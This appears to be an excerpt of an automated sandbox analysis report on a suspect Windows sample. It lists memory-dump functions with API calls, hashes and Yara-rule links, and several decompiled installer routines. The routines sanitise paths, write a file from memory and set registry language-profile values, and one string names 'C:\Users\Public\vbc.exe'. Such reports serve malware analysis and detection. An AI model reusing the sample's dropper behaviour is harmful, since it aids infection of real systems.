                                          • Opcode ID: 6140695aa2c3c355fae86e48aba0d39237f2862502cb683440458cbb598cb8e2
                                          • Instruction ID: 21ff69b6d0de9df669c9189513857e3110406e759913047922b54b077a0bf55b
                                          • Opcode Fuzzy Hash: 6140695aa2c3c355fae86e48aba0d39237f2862502cb683440458cbb598cb8e2
                                          • Instruction Fuzzy Hash: 725128B5A40208BBEB10CFA4DC85FEE73B8FB48700F108559F609AB185D775EA40CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002270, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 123registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
                                          • RegOpenKeyExW.ADVAPI32 ref: 10002344
                                          • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
                                          • RegCloseKey.ADVAPI32(?), ref: 1000237C
                                          • RegOpenKeyExW.ADVAPI32 ref: 1000239F
                                          • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
                                          • RegCloseKey.ADVAPI32(?), ref: 100023D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseFromOpenQueryStringValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
                                          • API String ID: 193680167-3603924166
                                          • Opcode ID: 965f598014044e6cb2a74314dd359c2b21e1ba92f68f0197124d58f804cc13c6
                                          • Instruction ID: e0afc1c3e8cc1758114bb43238032c388e7b65ae456dc7f798437941352d8589
                                          • Opcode Fuzzy Hash: 965f598014044e6cb2a74314dd359c2b21e1ba92f68f0197124d58f804cc13c6
                                          • Instruction Fuzzy Hash: 59411BB5900219FBEB10DF90CD85FEE77B8EB48341F108558F609A6185D774AB84CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002400, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
                                          • RegOpenKeyExW.ADVAPI32 ref: 100024C4
                                          • RegSetValueExW.ADVAPI32 ref: 100024E6
                                          • RegCloseKey.ADVAPI32(?), ref: 100024F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FromString$CloseOpenValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                          • API String ID: 3688305288-1256949467
                                          • Opcode ID: dcad35c9addcfa30248687e1e7a228625dd348cd4a81a67f9936bd1afb2d6bb6
                                          • Instruction ID: dd30ddd5a5cb2d9cca6a9fcc35acfb5c399f927f0ea2933d465295ab16058b1e
                                          • Opcode Fuzzy Hash: dcad35c9addcfa30248687e1e7a228625dd348cd4a81a67f9936bd1afb2d6bb6
                                          • Instruction Fuzzy Hash: 853171F6940209BBEB10DF94DC85FEE73BCEB48304F008058FB0996145E634EA84DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002160, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
                                          • RegOpenKeyExW.ADVAPI32 ref: 10002224
                                          • RegSetValueExW.ADVAPI32 ref: 10002246
                                          • RegCloseKey.ADVAPI32(?), ref: 10002250
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FromString$CloseOpenValue
                                          • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                                          • API String ID: 3688305288-1256949467
                                          • Opcode ID: 4a201888ca8155c40b196f2c3bb0ed33290918c1e59c55bb0eaeb5826365ea5f
                                          • Instruction ID: 707a816b6f367a8867edb1d894fc3f74974bc16e3b4ae18b67003bc7ae207e43
                                          • Opcode Fuzzy Hash: 4a201888ca8155c40b196f2c3bb0ed33290918c1e59c55bb0eaeb5826365ea5f
                                          • Instruction Fuzzy Hash: 843171F6900209BBEB10DFD4DC45FEE73B8EB49344F008158FB09A6145E634EA94DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001490, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
                                          • RegSetValueExW.ADVAPI32 ref: 1000155E
                                          • RegCloseKey.ADVAPI32(?), ref: 1000156E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FromString$CloseCreateValue
                                          • String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
                                          • API String ID: 32363474-1306068423
                                          • Opcode ID: 15eac15c22e6ca0fd1bef94188981c34aea0e966a95ebf0e999b4a3de9402c17
                                          • Instruction ID: 970c8a12cf1038bedb1d76203bb66aad53a9130514561c716853c8dd6fd8085d
                                          • Opcode Fuzzy Hash: 15eac15c22e6ca0fd1bef94188981c34aea0e966a95ebf0e999b4a3de9402c17
                                          • Instruction Fuzzy Hash: B2214FB5900318FBFB10DB90CC89FEEB3B8EB48705F108148F7196A181D774AA84CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100010A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
                                          • HeapAlloc.KERNEL32(00000000), ref: 100010B1
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
                                          • HeapFree.KERNEL32(00000000), ref: 1000110F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Process$AllocFree
                                          • String ID: returning %p
                                          • API String ID: 756756679-1981732286
                                          • Opcode ID: ce3facce4ff9c26b52351e7df047192d033f14a14ca3dc13a5d1e94c2effc99a
                                          • Instruction ID: 7e5beea36896861cde5788d291afa94460dc3cd3070cc2fbcf440a17265baa9d
                                          • Opcode Fuzzy Hash: ce3facce4ff9c26b52351e7df047192d033f14a14ca3dc13a5d1e94c2effc99a
                                          • Instruction Fuzzy Hash: E5213D78A44208FFE700DFA0CD89B9D77B5EB49741F208048FA09AB395D775AE80DB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002FF0, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32 ref: 1000305D
                                          • RegEnumKeyExW.ADVAPI32(?,?,?,00000027,00000000,00000000,00000000,00000000), ref: 100030A6
                                          • RegCloseKey.ADVAPI32(?), ref: 100030C5
                                          • CLSIDFromString.OLE32(?,?), ref: 100030FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseEnumFromOpenString
                                          • String ID: %s\%s\0x%08x$'$LanguageProfile
                                          • API String ID: 2638302380-2813637096
                                          • Opcode ID: 5eed58f2ea4a22bca3c4b3957828da32315238e0d51bc9520cea9a942b8bead6
                                          • Instruction ID: 85c7a27dcce935bfc98fc901b500c2beed21861ca5b25b0ed885c813cd7c1327
                                          • Opcode Fuzzy Hash: 5eed58f2ea4a22bca3c4b3957828da32315238e0d51bc9520cea9a942b8bead6
                                          • Instruction Fuzzy Hash: 3661E5B5600209EFDB04DF54C890BAABBB9FF48354F10C259F9099B395D774EA85CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405B89, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405B89(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040548B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                          0x00405b8b
                                          0x00405b93
                                          0x00405ba7
                                          0x00405ba7
                                          0x00405bad
                                          0x00405bba
                                          0x00405bba
                                          0x00405bbb
                                          0x00405bbd
                                          0x00405bc1
                                          0x00405bc3
                                          0x00405bcc
                                          0x00405bce
                                          0x00405be8
                                          0x00405bf0
                                          0x00405bf0
                                          0x00405bf5
                                          0x00405bf7
                                          0x00405bf9
                                          0x00405bfd
                                          0x00405bfe
                                          0x00405c01
                                          0x00405c09
                                          0x00405c0b
                                          0x00405c0f
                                          0x00000000
                                          0x00000000
                                          0x00405c15
                                          0x00405c1a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405c1a
                                          0x00405c1f

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-1374994687
                                          • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                          • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                          • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                          • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403D44, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                          0x00403d56
                                          0x00403dea
                                          0x00000000
                                          0x00403dea
                                          0x00403d67
                                          0x00403d6b
                                          0x00000000
                                          0x00000000
                                          0x00403d71
                                          0x00403d7a
                                          0x00403d7d
                                          0x00403d7d
                                          0x00403d83
                                          0x00403d89
                                          0x00403d89
                                          0x00403d95
                                          0x00403d9b
                                          0x00403da2
                                          0x00403da5
                                          0x00403da8
                                          0x00403daa
                                          0x00403daa
                                          0x00403db2
                                          0x00403db8
                                          0x00403db8
                                          0x00403dc2
                                          0x00403dc7
                                          0x00403dca
                                          0x00403dcf
                                          0x00403dd2
                                          0x00403dd2
                                          0x00403de2
                                          0x00403de2
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                          • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                          • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040548B(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E004055E3(_t52);
				_t27 = E00405602(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42eb74; // 0x31a00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403098(_t47);
						E00403066(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                          0x0040266e
                                          0x00402670
                                          0x0040267c
                                          0x0040267f
                                          0x00402689
                                          0x0040268d
                                          0x0040268d
                                          0x00402693
                                          0x004026a0
                                          0x004026a8
                                          0x004026ab
                                          0x004026b1
                                          0x004026bf
                                          0x004026c4
                                          0x004026c8
                                          0x004026cb
                                          0x004026d4
                                          0x004026e0
                                          0x004026e4
                                          0x004026e7
                                          0x004026f1
                                          0x00402710
                                          0x004026f8
                                          0x004026fd
                                          0x00402705
                                          0x00402708
                                          0x0040270d
                                          0x0040270d
                                          0x00402717
                                          0x00402717
                                          0x00402729
                                          0x00402730
                                          0x00402742
                                          0x00402742
                                          0x00402748
                                          0x00402748
                                          0x00402753
                                          0x00402754
                                          0x00402758
                                          0x0040275c
                                          0x00402762
                                          0x00402762
                                          0x00402769
                                          0x00402156
                                          0x00402880
                                          0x0040288c

                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00031A00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                          • GlobalFree.KERNEL32(?), ref: 00402717
                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402729
                                          • GlobalFree.KERNEL32(00000000), ref: 00402730
                                          • CloseHandle.KERNEL32(FFFFFD66), ref: 00402748
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                          • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                          • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                          • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404CC9, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404CC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e344; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec14; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
					}
					_t26 = lstrlenA(0x4297b0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4297b0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x4297b0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x4297b0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                          0x00404ccf
                                          0x00404cdb
                                          0x00404cde
                                          0x00404ce4
                                          0x00404cf0
                                          0x00404cf3
                                          0x00404cf6
                                          0x00404cfc
                                          0x00404cfc
                                          0x00404d02
                                          0x00404d0a
                                          0x00404d0d
                                          0x00404d2a
                                          0x00404d2e
                                          0x00404d37
                                          0x00404d37
                                          0x00404d41
                                          0x00404d4a
                                          0x00404d56
                                          0x00404d5d
                                          0x00404d61
                                          0x00404d64
                                          0x00404d77
                                          0x00404d85
                                          0x00404d85
                                          0x00404d89
                                          0x00404d8b
                                          0x00404d8e
                                          0x00000000
                                          0x00404d8e
                                          0x00404d0f
                                          0x00404d17
                                          0x00404d1f
                                          0x00404d25
                                          0x00000000
                                          0x00404d25
                                          0x00404d1f
                                          0x00404d0d
                                          0x00404d98

                                          APIs
                                          • lstrlenA.KERNEL32(004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                          • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041FA6B,74EC110C,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                          • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041FA6B,74EC110C), ref: 00404D25
                                          • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                          • SendMessageA.USER32 ref: 00404D5D
                                          • SendMessageA.USER32 ref: 00404D77
                                          • SendMessageA.USER32 ref: 00404D85
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                          • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                          • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                          • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404598, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404598(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                          0x004045a6
                                          0x004045b3
                                          0x004045b9
                                          0x004045f7
                                          0x004045f7
                                          0x00404606
                                          0x0040460d
                                          0x00000000
                                          0x0040460f
                                          0x004045bb
                                          0x004045ca
                                          0x004045d2
                                          0x004045d5
                                          0x004045e7
                                          0x004045ed
                                          0x004045f4
                                          0x00000000
                                          0x004045f4
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
